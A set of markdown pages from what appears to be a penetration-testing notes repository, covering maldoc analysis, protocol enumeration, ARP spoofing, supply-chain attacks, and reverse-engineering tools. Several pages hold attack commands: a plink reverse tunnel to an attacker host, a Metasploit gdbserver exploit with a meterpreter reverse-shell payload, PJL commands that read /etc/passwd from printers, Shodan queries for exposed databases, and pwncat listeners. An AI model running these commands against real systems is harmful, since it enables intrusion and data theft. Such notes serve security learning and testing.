22 | 23 | ## Basic Usage 24 | 25 | ### 1. Start Orange Software 26 | 27 | ```bash 28 | python -m Orange.canvas 29 | ``` 30 | 31 | ### 2. Open .OWS File 32 | 33 | When the Orange starts, open the “.ows” file. 34 | 35 | ### 3. Import Data File 36 | 37 | Add the File widget in the left pane, and import data file such as “.csv”. 38 | 39 | ### 4. Workflows 40 | 41 | Connect the File widget with the Scatter Plot widget and open the Scatter Plot. We can see the data with plot. -------------------------------------------------------------------------------- /src/exploit/machine-learning/read-pt.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Read PT File 3 | description: A PT file is a machine learning model file generated by PyTorch. 4 | tags: 5 | - Machine Learning 6 | refs: 7 | date: 2023-03-26 8 | draft: false 9 | --- 10 | 11 | ## Load Model from PT 12 | 13 | ```python 14 | import torch 15 | import torch.nn as nn 16 | 17 | class ExampleModel(nn.Module): 18 | def __init__(self): 19 | super().__init__() 20 | self.flatten = nn.Flatten() 21 | self.linear_relu_stack = nn.Sequential( 22 | nn.Linear(28*28, 512), 23 | nn.ReLU(), 24 | nn.Linear(512, 10)) 25 | 26 | def forward(self, x): 27 | x = self.flatten(x) 28 | logits = self.linear_relu_stack(x) 29 | return logits 30 | 31 | model = ExampleModel() 32 | model.load_state_dict(torch.load('example.pt')) 33 | print(model) 34 | ``` -------------------------------------------------------------------------------- /src/exploit/malware/_data.yml: -------------------------------------------------------------------------------- 1 | category1: malware 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/malware/maldoc-analysis.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Maldoc Analysis 3 | description: Malicious Documents (.doc) are Microsoft documents contain malicious execution code. 4 | tags: 5 | - Malware 6 | refs: 7 | date: 2023-08-06 8 | draft: false 9 | --- 10 | 11 | ## Static Analysis 12 | 13 | ### Extract Files in Doc 14 | 15 | ```bash 16 | unzip example.doc 17 | ``` 18 | 19 | ### Find Interesting Information 20 | 21 | ```bash 22 | strings example.doc 23 | exiftool example.doc 24 | binwalk -e example.doc 25 | ``` 26 | 27 | Additionally, we can use CyberChef. Follow this steps: 28 | 29 | 1. Open **CyberChef** 30 | 2. Upload the suspicious doc file on CyberChef. 31 | 3. Use the **"Strings"** function to extract strings. 32 | 4. If you found obfuscated strings in the results, add the **"Find / Replace"** function to remove extra strings. 33 | 5. If necessary, add the **"Drop bytes"** function to remove extra bytes. 34 | 35 | ### Dump Macros 36 | 37 | If you don’t have `oletools`, install it first. 38 | 39 | ```bash 40 | # Install `oletools` module 41 | python -m ven venv 42 | source venv/bin/activate 43 | pip install oletools 44 | ``` 45 | 46 | To dump macros, run the following command. 47 | 48 | ```bash 49 | olevba -c example.doc 50 | ``` 51 | -------------------------------------------------------------------------------- /src/exploit/malware/npm-supply-chain-attack.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: NPM Supply Chain Attack 3 | description: An attacker might be able to lead an organization to install a malicious NPM package by abusing misconfiguration of the internal proxy server or package manager. 4 | tags: 5 | - Malware 6 | - Supply Chain 7 | refs: 8 | - https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610 9 | - https://snyk.io/blog/npm-security-preventing-supply-chain-attacks/ 10 | date: 2023-07-12 11 | draft: false 12 | --- 13 | 14 | This page has lack of content yet. 15 | 16 | ## Dependency Confusion 17 | 18 | The [PoC](https://github.com/x1337loser/Dependency-Confusion) is available thanks to the researcher who discovered the threat. 19 | 20 |
21 | 22 | ## Lock File Injection 23 | 24 | Attackers may insert their malicious npm package into **`yarn.lock`** or **`package-lock.json`** in the target project. -------------------------------------------------------------------------------- /src/exploit/memory/_data.yml: -------------------------------------------------------------------------------- 1 | category1: memory 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/mobile/_data.yml: -------------------------------------------------------------------------------- 1 | category1: mobile 2 | related_menus: 3 | - title: Android 4 | id: android -------------------------------------------------------------------------------- /src/exploit/mobile/android/_data.yml: -------------------------------------------------------------------------------- 1 | category2: android -------------------------------------------------------------------------------- /src/exploit/network/_data.yml: -------------------------------------------------------------------------------- 1 | category1: network 2 | related_menus: 3 | - title: Protocol 4 | id: protocol 5 | - title: Port Forwarding 6 | id: port-forwarding 7 | - title: WiFi 8 | id: wifi 9 | - title: Attack 10 | id: attack 11 | - title: Tool 12 | id: tool 13 | - title: VPN 14 | id: vpn 15 | - title: Others 16 | id: others -------------------------------------------------------------------------------- /src/exploit/network/arp-spoofing.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: ARP (Address Resolution Protocol) Spoofing 3 | description: ARP is used to find another computer’s MAC address based on its IP address. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2022-11-22 8 | draft: false 9 | --- 10 | 11 | ## Basic Flow 12 | 13 | 1. **Check Interface and Gateway IP Address** 14 | 15 | ```sh 16 | # Interfaces 17 | ip addr 18 | 19 | # Default gateway 20 | ip route list 21 | ``` 22 | 23 | 2. **Scan the Network to Find Target IP** 24 | 25 | ```sh 26 | nmap -sP /24 27 | nmap -sP /16 28 | ``` 29 | 30 | 3. **Enable IP Forwarding** 31 | 32 | ```sh 33 | # Allow all forwading in the LAN 34 | # -A: append rules 35 | # -i: interface 36 | # -j: jump 37 | iptables -A FORWARD -i eth0 -j ACCEPT 38 | ``` 39 | 40 |
41 | 42 | ## Find MAC Address 43 | 44 | ```sh 45 | cat /sys/class/net/eth0/address 46 | cat /sys/class/net/enp0s3/address 47 | cat /sys/class/net/tun0/address 48 | ``` -------------------------------------------------------------------------------- /src/exploit/network/attack/_data.yml: -------------------------------------------------------------------------------- 1 | category2: attack -------------------------------------------------------------------------------- /src/exploit/network/eternetip-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: EthernetIP Pentesting 3 | description: EtherNet/IP is an industrial network protocol that adopts the Common Industrial Protocol to standart Ethernet. A default port is 44818. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2023-01-27 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```bash 14 | nmap --script enip-info -p 44818 15 | ``` -------------------------------------------------------------------------------- /src/exploit/network/firewall.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Firewall 3 | description: It's a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2022-12-11 8 | draft: false 9 | --- 10 | 11 | ## Status 12 | 13 | ```sh 14 | ufw status 15 | ufw status verbose 16 | ``` 17 | 18 |
19 | 20 | ## Enable/Disable the Firewall 21 | 22 | ```sh 23 | ufw enable 24 | 25 | ufw disable 26 | ``` 27 | 28 |
29 | 30 | ## Set Default Policies 31 | 32 | ```sh 33 | # Allow all 34 | ufw default ALLOW 35 | 36 | # Deny all 37 | ufw default DENY 38 | ``` 39 | 40 |
41 | 42 | ## Rules 43 | 44 | - **Allow** 45 | 46 | ```sh 47 | ufw allow 22 48 | ufw allow 22/tcp 49 | ufw allow 80 50 | ufw allow 80/tcp 51 | 52 | # Allow the given ip address access to port 22 for all protocols 53 | ufw allow from to any port 22 54 | ``` 55 | 56 | - **Deny** 57 | 58 | ```sh 59 | ufw deny 22 60 | ufw deny 22/tcp 61 | ufw deny 80 62 | ufw deny 80/tcp 63 | ``` -------------------------------------------------------------------------------- /src/exploit/network/grpc-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: gRPC Pentesting 3 | description: gRPC is a cross-platform open source high performance remote procedure call framework. Default ports are 80, 443 and the official docs example use 50051 port. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2023-05-28 8 | draft: false 9 | --- 10 | 11 | ## Connect with [grpcui](https://github.com/fullstorydev/grpcui) 12 | 13 | **`grpcui`** is an interactive web UI for **gRPC**. 14 | If you don’t have `grpcui`, you need to install it. 15 | 16 | ```bash 17 | go install github.com/fullstorydev/grpcui/cmd/grpcui@latest 18 | ``` 19 | 20 | Then we can interact with gRPC. 21 | 22 | ```bash 23 | grpcui -plaintext example.com:9019 24 | ``` -------------------------------------------------------------------------------- /src/exploit/network/port-forwarding/_data.yml: -------------------------------------------------------------------------------- 1 | category2: port-forwarding -------------------------------------------------------------------------------- /src/exploit/network/port-forwarding/port-forwarding-with-plink.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Port Forwarding with Plink 3 | description: Plink is a Windows command line version of the PuTTY SSH client. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2023-03-19 8 | draft: false 9 | --- 10 | 11 | ## Reverse Connection 12 | 13 | ### 1. Open Lisnter in Your Local Machine 14 | 15 | ```sh 16 | nc -lvnp 4444 17 | ``` 18 | 19 | ### 2. Run Reverse Connection in Target Machine 20 | 21 | First of all, generate SSH keys. Two keys (public and private) will be generated. 22 | 23 | ```sh 24 | ssh-keygen 25 | ``` 26 | 27 | Convert the private key for Windows. 28 | 29 | ```sh 30 | puttygen private_key -o private_key.ppk 31 | ``` 32 | 33 | Run reverse connection using plink. 34 | 35 | ```powershell 36 | cmd.exe /c echo y | .\plink.exe -R :: attacker@ -i private_key.ppk -N 37 | ``` 38 | -------------------------------------------------------------------------------- /src/exploit/network/protocol/_data.yml: -------------------------------------------------------------------------------- 1 | category2: protocol -------------------------------------------------------------------------------- /src/exploit/network/protocol/dhcp-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: DHCP (Dynamic Host Configuration Protocol) Pentesting 3 | description: DHCP uses UDP. Port 67 is for a server, port 68 is for a client. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2022-12-10 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```sh 14 | nmap -sU --script broadcast-dhcp-discover -p 67,68 15 | ``` 16 | -------------------------------------------------------------------------------- /src/exploit/network/protocol/irc-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: IRC (Internet Relay Chat) Pentesting 3 | description: IRC is a protocol that allows the communication in the form of text between multiple parties. Default ports are 194,6667. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2023-02-26 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```bash 14 | nmap --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194 15 | ``` 16 | -------------------------------------------------------------------------------- /src/exploit/network/protocol/memcache-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Memcache Pentesting 3 | description: Memcached is a general-purpose distributed memory caching system. A default port is 11211. 4 | tags: 5 | - Web 6 | refs: 7 | - https://book.hacktricks.xyz/network-services-pentesting/11211-memcache 8 | date: 2023-02-23 9 | draft: false 10 | --- 11 | 12 | ## Communication 13 | 14 | We can communicate with memcache server using Netcat. 15 | 16 | ```bash 17 | nc -vn 11211 18 | Connection to 11211 port [tcp/*] succeeded! 19 | 20 | # Commands in nc 21 | version 22 | stats 23 | stats slabs 24 | stats items 25 | stats cachedump 0 26 | stats cachedump 1 0 27 | get 28 | ``` -------------------------------------------------------------------------------- /src/exploit/network/protocol/modbus-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Modbus Pentesting 3 | description: Modbus is a data communications protocol. A default port is 502. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2023-01-06 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```bash 14 | nmap --script modbus-discover --script-args modbus-discover.aggressive=true -p 502 15 | ``` 16 | -------------------------------------------------------------------------------- /src/exploit/network/protocol/ntp-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: NTP (Network Time Protocol) Pentesting 3 | description: NTP is a networking protocol for clock synchronization between computer systems over packet-switched. Default port is 123. It uses UDP. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2022-12-01 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```sh 14 | nmap -sU --script ntp-info -p 123 15 | nmap -sU --script ntp-monlist -p 123 16 | nmap -sU --script ntp* -p 123 17 | nmap -sU --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 18 | ``` 19 | 20 | ### Ntpq 21 | 22 | ```sh 23 | ntpq -c readlist 24 | ntpq -c readvar 25 | ntpq -c peers 26 | ntpq -c associations 27 | ntpdc -c monlist 28 | ntpdc -c listpeers 29 | ntpdc -c sysinfo 30 | ``` 31 | -------------------------------------------------------------------------------- /src/exploit/network/protocol/pptp-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: PPTP Pentesting 3 | description: PPTP is one of the first VPN protocols. It relies on the MPPE (Microsoft Point-to-Point Encryption) protocol. A default port is 1723. 4 | tags: 5 | - SSH 6 | refs: 7 | - https://www.linkedin.com/pulse/common-vpn-vulnerabilities-exploits-abed-a-a- 8 | date: 2023-10-05 9 | draft: false 10 | --- 11 | 12 | ## Enumeration 13 | 14 | ```bash 15 | nmap --script pptp-version -p 1723 16 | ``` 17 | -------------------------------------------------------------------------------- /src/exploit/network/protocol/telnet-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Telnet Pentesting 3 | description: Telnet is an application protocol used on the internet or local area network. A default port is 23. 4 | tags: 5 | - Network 6 | - Telnet 7 | refs: 8 | date: 2023-10-30 9 | draft: false 10 | --- 11 | 12 | ## Enumeration 13 | 14 | ```sh 15 | nmap --script telnet-encryption -p 23 16 | nmap --script telnet-ntlm-info -p 23 17 | nmap --script telnet-brute --script-args userdb=users.txt,passdb=passwords.txt,telnet-brute.timeout=8s -p 23 18 | ``` 19 | 20 |
21 | 22 | ## Configuration Files 23 | 24 | ```bash 25 | cat /etc/inetd.conf 26 | # or 27 | cat /etc/xinetd.d/telnet 28 | ``` 29 | 30 |
31 | 32 | ## Connect 33 | 34 | ```sh 35 | telnet 36 | telnet 23 37 | ``` 38 | -------------------------------------------------------------------------------- /src/exploit/network/protocol/tftp-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: TFTP (Trivial File Transfer Protocol) Pentesting 3 | description: TFTP is a simple lockstep file transfer protocol which allows a client to get a file from or put a file onto a remote host. It uses UDP. A default port is 69. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2023-10-30 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```sh 14 | nmap -sU --script tftp-enum -p 69 15 | ``` 16 | 17 |
18 | 19 | ## Configuration Files 20 | 21 | ```bash 22 | cat /etc/inetd.conf 23 | # or 24 | cat /etc/xinetd.d/tftp 25 | ``` -------------------------------------------------------------------------------- /src/exploit/network/protocol/upnp-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: UPnP (Universal Plug and Play) Pentesting 3 | description: UPnP is a network protocol that allow devices to discover and interact with each other seamlessly over a local network. Default ports are 1900(UDP) and 5000 (TCP). 4 | tags: 5 | - Network 6 | refs: 7 | date: 2023-02-25 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```bash 14 | nmap -sU --script upnp-info -p 1900 15 | nmap --script upnp-info -p 5000 16 | nmap --script broadcast-upnp-info -p 1900 17 | ``` -------------------------------------------------------------------------------- /src/exploit/network/protocol/waste-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: WASTE Pentesting 3 | description: A peer-to-peer and end-to-end protocol and software application. The ports often used are 1337, 31337. 4 | tags: 5 | - Network 6 | refs: 7 | dates: 2022-12-01 8 | draft: false 9 | --- 10 | 11 | ## Connect 12 | 13 | ```sh 14 | connect 1337 15 | # or 16 | nc 1337 17 | ``` -------------------------------------------------------------------------------- /src/exploit/network/redos.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: ReDoS (Regular Expression Denial of Service) 3 | description: ReDOS is an attack method to compromise the Regex vulnerabilities which evaluate arbitrary inputs. 4 | tags: 5 | - Network 6 | refs: 7 | - https://en.wikipedia.org/wiki/ReDoS#Examples 8 | - https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS 9 | date: 2023-10-12 10 | draft: false 11 | --- 12 | 13 | ## Evil (Vulnerable) Regex 14 | 15 | ```html 16 | (a+)+ 17 | ([a-zA-Z]+)* 18 | (a|aa)+ 19 | (a|a?)+ 20 | (.*a){x} for x \> 10 21 | ^(([a-z])+.)+[A-Z]([a-z])+$ 22 | 23 | 24 | /^([a-zA-Z0-9])(([\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/ 25 | ``` 26 | 27 |
28 | 29 | ## Malicious Input 30 | 31 | If a target website validates user input with the above vulnerable Regex, we may be able to compromise the target system by the following malicious input: 32 | 33 | ```bash 34 | aaaaaaaaaaaaaaaaaaaaaaaa! 35 | ``` 36 | -------------------------------------------------------------------------------- /src/exploit/network/tool/_data.yml: -------------------------------------------------------------------------------- 1 | category2: tool -------------------------------------------------------------------------------- /src/exploit/network/tool/decrypt-putty-sessions-files.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Decrypt SolarPuTTY Sessions Files 3 | description: 4 | tags: 5 | - Network 6 | refs: 7 | date: 2024-12-06 8 | draft: false 9 | --- 10 | 11 | ## Decrypt 12 | 13 | Python code is here: [xHacka's SolarPuttyDecrypt.py](https://gist.github.com/xHacka/052e4b09d893398b04bf8aff5872d0d5) 14 | 15 | ```sh 16 | python3 SolarPuTTYDecrypt.py sessions.dat wordlist.txt 17 | ``` -------------------------------------------------------------------------------- /src/exploit/network/vpn/_data.yml: -------------------------------------------------------------------------------- 1 | category2: vpn -------------------------------------------------------------------------------- /src/exploit/network/vpn/ipsec-vpn-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: IPsec VPN Pentesting 3 | description: IPsec (Internet Protocol Security) is a secure network protocol suite that authenticates and encrypts packets of data to provide secure encrypted communication between two computers over an Internet Protocol network. It is used in VPN (Virtual Private Network). Default ports are 443 (SSL), 500 (IPSec). 4 | tags: 5 | - VPN 6 | refs: 7 | date: 2022-12-26 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```sh 14 | nmap --script http-cisco-anyconnect -p 443 15 | nmap --script ike-version -p 500 16 | ``` -------------------------------------------------------------------------------- /src/exploit/network/wifi/_data.yml: -------------------------------------------------------------------------------- 1 | category2: wifi -------------------------------------------------------------------------------- /src/exploit/network/wifi/wifi-password-recovery.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: WiFi Password Recovery 3 | description: If we forget WiFi password, we may be able to recover password from the history. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2023-07-15 8 | draft: false 9 | --- 10 | 11 | ## Windows 12 | 13 | Open Command Prompt as Administrator and then execute the following commands: 14 | 15 | ```sh 16 | # Show all network names you've accessed and saved 17 | netsh wlan show profile 18 | 19 | # Show the details of the specific network including password 20 | netsh wlan show profile name="network-name" key=clear 21 | ``` 22 | 23 |
24 | 25 | ## Linux 26 | 27 | ```sh 28 | ls -al /etc/NetworkManager/system-connections/ 29 | cat /etc/NetworkManager/system-connections/example.nmconnection 30 | ``` 31 | -------------------------------------------------------------------------------- /src/exploit/printer/_data.yml: -------------------------------------------------------------------------------- 1 | category1: printer 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/printer/raw-printing-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Raw Printing Pentesting 3 | description: PLJ (Printer Job Languages) is a method for switching printer languages. A default port is 9100. 4 | tags: 5 | - Printer 6 | refs: 7 | - https://developers.hp.com/system/files/PJL_Technical_Reference_Manual.pdf 8 | - https://book.hacktricks.xyz/network-services-pentesting/9100-pjl 9 | date: 2023-07-19 10 | draft: false 11 | --- 12 | 13 | ## Enumeration 14 | 15 | ```sh 16 | nmap --script pjl-ready-message -p 9100 17 | ``` 18 | 19 |
20 | 21 | ## Connect 22 | 23 | ```bash 24 | nc 9100 25 | ``` 26 | 27 |
28 | 29 | ## Commands 30 | 31 | ```bash 32 | # See printer information 33 | @PJL INFO STATUS 34 | @PJL INFO ID 35 | @PJL INFO PRODINFO 36 | 37 | # See directories in the system 38 | @PJL FSDIRLIST NAME="0:" ENTRY=1 39 | @PJL FSDIRLIST NAME="0:/../" ENTRY=1 40 | @PJL FSDIRLIST NAME="0:/../etc/" ENTRY=1 41 | @PJL FSDIRLIST NAME="0:/../home/" ENTRY=1 42 | 43 | # See contents of a file 44 | @PJL FSUPLOAD NAME="0:/../etc/passwd" ENTRY=1 45 | ``` -------------------------------------------------------------------------------- /src/exploit/privacy/_data.yml: -------------------------------------------------------------------------------- 1 | category1: tor 2 | related_menus: 3 | - title: Tor 4 | id: tor -------------------------------------------------------------------------------- /src/exploit/privacy/tor/_data.yml: -------------------------------------------------------------------------------- 1 | category2: tor -------------------------------------------------------------------------------- /src/exploit/quantum/_data.yml: -------------------------------------------------------------------------------- 1 | category1: quantum 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/quantum/read-qasm.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Read QASM 3 | description: QASM (Quantum Assembly Language) is a language used to program quantum computers. It is similar in concept to assembly language used in classical computers, but instead of operating on bits, QASM operates on quantum bits (qubits). 4 | tags: 5 | - Quantum 6 | refs: 7 | - https://github.com/Taoudi/Cyber_Apocalypse/blob/main/HTB.ipynb 8 | date: 2023-03-26 9 | draft: false 10 | --- 11 | 12 | ## Install Qiskit 13 | 14 | ```python 15 | pip install oqi qiskit 16 | ``` 17 | 18 |
19 | 20 | ## Read QASM 21 | 22 | ```python 23 | from qiskit import QuantumCircuit, transpile 24 | from qiskit.providers.aer import QasmSimulator 25 | from qiskit.visualization import plot_histogram 26 | 27 | simulator = QasmSimulator() 28 | circuit = QuantumCircuit.from_qasm_file('example.qasm') 29 | compiled_circuit = transpile(circuit, simulator) 30 | job = simulator.run(compiled_circuit, shots=1000) 31 | result = job.result() 32 | 33 | counts = result.get_counts(compiled_circuit) 34 | print(counts) 35 | ``` -------------------------------------------------------------------------------- /src/exploit/reconnaissance/_data.yml: -------------------------------------------------------------------------------- 1 | category1: reconnaissance 2 | related_menus: 3 | - title: OSINT 4 | id: osint 5 | - title: Search Technique 6 | id: search-technique 7 | - title: Network 8 | id: network 9 | - title: Subdomain 10 | id: subdomain 11 | - title: Others 12 | id: others -------------------------------------------------------------------------------- /src/exploit/reconnaissance/network/_data.yml: -------------------------------------------------------------------------------- 1 | category2: network -------------------------------------------------------------------------------- /src/exploit/reconnaissance/osint/_data.yml: -------------------------------------------------------------------------------- 1 | category2: osint -------------------------------------------------------------------------------- /src/exploit/reconnaissance/search-technique/_data.yml: -------------------------------------------------------------------------------- 1 | category2: search-technique -------------------------------------------------------------------------------- /src/exploit/reconnaissance/search-technique/shodan-dorks.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Shodan Dorks 3 | description: Shordan is a search engine which allows us to find various types of servers by filters. This page gives ways to search specific information. 4 | tags: 5 | - OSINT 6 | - Reconnaissance 7 | refs: 8 | - https://systemweakness.com/how-to-find-open-elasticsearch-databases-using-shodan-fb9314af604a 9 | date: 2023-07-14 10 | draft: false 11 | --- 12 | 13 | ```bash 14 | product:elastic port:9200 country:us 15 | product:postgresql port:5432 country:jp 16 | 17 | # Search 'users' column 18 | proudct:elastic port:9200 users 19 | ``` 20 | -------------------------------------------------------------------------------- /src/exploit/reconnaissance/subdomain/_data.yml: -------------------------------------------------------------------------------- 1 | category2: subdomain -------------------------------------------------------------------------------- /src/exploit/reverse-engineering/_data.yml: -------------------------------------------------------------------------------- 1 | category1: reverse-engineering 2 | related_menus: 3 | - title: Assembly 4 | id: assembly 5 | - title: Cheatsheet 6 | id: cheatsheet 7 | - title: Reversing 8 | id: reversing 9 | - title: Debugger 10 | id: debugger 11 | - title: Others 12 | id: others -------------------------------------------------------------------------------- /src/exploit/reverse-engineering/assembly/_data.yml: -------------------------------------------------------------------------------- 1 | category2: assembly -------------------------------------------------------------------------------- /src/exploit/reverse-engineering/cheatsheet/_data.yml: -------------------------------------------------------------------------------- 1 | category2: cheatsheet -------------------------------------------------------------------------------- /src/exploit/reverse-engineering/debugger/_data.yml: -------------------------------------------------------------------------------- 1 | category2: debugger -------------------------------------------------------------------------------- /src/exploit/reverse-engineering/debugger/gdbserver-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: GdbServer Pentesting 3 | description: 4 | tags: 5 | - Reverse Engineering 6 | refs: 7 | date: 2024-07-17 8 | draft: false 9 | --- 10 | 11 | ## Reverse Shell with Metasploit 12 | 13 | ```bash 14 | msfconsole 15 | msf> use exploit/multi/gdb/gdb_server_exec 16 | msf> set payload linux/x64/meterpreter/reverse_tcp 17 | msf> set rhost 18 | msf> set rport 19 | msf> set lhost 20 | msf> set lport 21 | msf> run 22 | ``` 23 | -------------------------------------------------------------------------------- /src/exploit/reverse-engineering/reversing/_data.yml: -------------------------------------------------------------------------------- 1 | category2: reversing -------------------------------------------------------------------------------- /src/exploit/reverse-engineering/reversing/reversing-elf.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Reversing ELF (Executable and Linking Format) 3 | description: ELF is a file format for executables of Linux. 4 | tags: 5 | - Reverse Engineering 6 | refs: 7 | date: 2024-02-18 8 | draft: false 9 | --- 10 | 11 | ## Static Analysis 12 | 13 | ```sh 14 | # -a: All 15 | readelf ./sample -a 16 | # -p: Dump the contents of section 17 | readelf ./sample -p .data 18 | readelf ./sample -p .text 19 | readelf ./sample -p .interp 20 | 21 | # Change MSB <=> LSB by editing binary number. 22 | hexedit ./sample 23 | (MSB) 7F 45 4C 46 02 02 01 ... <=> (LSB) 7F 45 4C 46 02 01 01 ... 24 | 25 | # Display shared object dependencies 26 | ldd ./sample 27 | ``` 28 | 29 | -------------------------------------------------------------------------------- /src/exploit/reverse-engineering/reversing/reversing-jar.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Reversing JAR File 3 | description: JAR (Java Archive) file can be reversed using some tools. 4 | tags: 5 | - Reverse Engineering 6 | refs: 7 | date: 2024-02-18 8 | draft: false 9 | --- 10 | 11 | ## Code Analysis 12 | 13 | We can use **`jdgui`** GUI tool. 14 | 15 | ```sh 16 | jd-gui 17 | ``` 18 | -------------------------------------------------------------------------------- /src/exploit/reverse-engineering/reversing/reversing-ole.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Reversing OLE 3 | description: OLE is a mechanism that allows users to create and edit documents containing items or "objects" created by multiple applications. 4 | tags: 5 | - Reverse Engineering 6 | refs: 7 | date: 2024-02-18 8 | draft: false 9 | --- 10 | 11 | ## Oledump 12 | 13 | It dumps the information of the OLE files. 14 | 15 | ```sh 16 | oledump.py example.doc 17 | 18 | # -s: stream number to analyze 19 | # -d: dump 20 | oledump.py -s 8 -d example.doc 21 | oledump.py -s 9 -d example.doc 22 | ``` 23 | 24 | Then decrypt the output using online tools like CyberChef. 25 | 26 |
27 | 28 | ## Olevba 29 | 30 | Download the **[Oletools](https://github.com/decalage2/oletools)** to use it. 31 | 32 | ```sh 33 | olevba example.docm 34 | ``` 35 | 36 | Copy the above Visual Basic code, and access to **[OneCompiler](https://onecompiler.com/)**. 37 | Select the programming language "Visual Basic". 38 | Paste the copied code to the editor, then click Run. 39 | 40 | -------------------------------------------------------------------------------- /src/exploit/reverse-engineering/reversing/reversing-pyc.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Reversing PYC (Python Compiled File) 3 | description: A PYC file is a compiled file generated from source code written in Python. 4 | tags: 5 | - Reverse Engineering 6 | refs: 7 | date: 2023-02-18 8 | draft: false 9 | --- 10 | 11 | ## Decompile 12 | 13 | [uncompyle6](https://github.com/rocky/python-uncompyle6/) is a PYC decompiler. 14 | 15 | We can install easily using pip. 16 | 17 | ```bash 18 | pip install uncompyle6 19 | ``` 20 | 21 | Then decompile the pyc file. 22 | 23 | ```bash 24 | uncompyle6 example.pyc 25 | ``` 26 | -------------------------------------------------------------------------------- /src/exploit/shell/_data.yml: -------------------------------------------------------------------------------- 1 | category1: shell 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/shell/reverse-shell-with-pwncat.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Reverse Shell with Pwncat 3 | description: Pwncat is a reverse and bind shell handler. 4 | tags: 5 | - Privilege Escalation 6 | - Reverse Shell 7 | - Windows 8 | refs: 9 | date: 2023-12-23 10 | draft: false 11 | --- 12 | 13 | It can be downloaded from [here](https://pwncat.org/). 14 | For listening from remote connection, run the following command. 15 | 16 | ```bash 17 | pwncat-cs -lp 4444 18 | 19 | # For Windows target 20 | pwncat-cs -m windows -lp 4444 21 | ``` 22 | 23 |
24 | 25 | ## Commands 26 | 27 | After reverse connecting, we can execute commands either local or remote. 28 | 29 | ```bash 30 | # Switch between Local and Remote shell 31 | Ctrl+D 32 | 33 | # Upload a file to target machine (e.g. upload example.txt from local to remote) 34 | (local) upload ./example.txt /tmp/example.txt 35 | ``` -------------------------------------------------------------------------------- /src/exploit/shell/upgrade-to-fully-interactive-tty.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Upgrade to Fully Interactive TTY 3 | description: After reverse shell, the shell has poorly functions, so we can upgrade to more functional shell. 4 | tags: 5 | - Privilege Escalation 6 | - Reverse Shell 7 | refs: 8 | date: 2023-04-08 9 | draft: false 10 | --- 11 | 12 | ## Upgrade 13 | 14 | After connecting to the target shell with reverse shell, it's recommended to make the shell to be more elegant. 15 | 16 | ```sh 17 | python3 -c 'import pty; pty.spawn("/bin/bash")' 18 | # or 19 | python -c 'import pty; pty.spawn("/bin/bash")' 20 | # or 21 | python2 -c 'import pty; pty.spawn("/bin/bash")' 22 | # or 23 | SHELL=/bin/bash script -q /dev/null 24 | ``` 25 | 26 | The commands below make our shell even more perfect. 27 | 28 | ```sh 29 | Ctrl+z 30 | stty raw -echo;fg 31 | Enter x2 32 | export TERM=xterm 33 | ``` 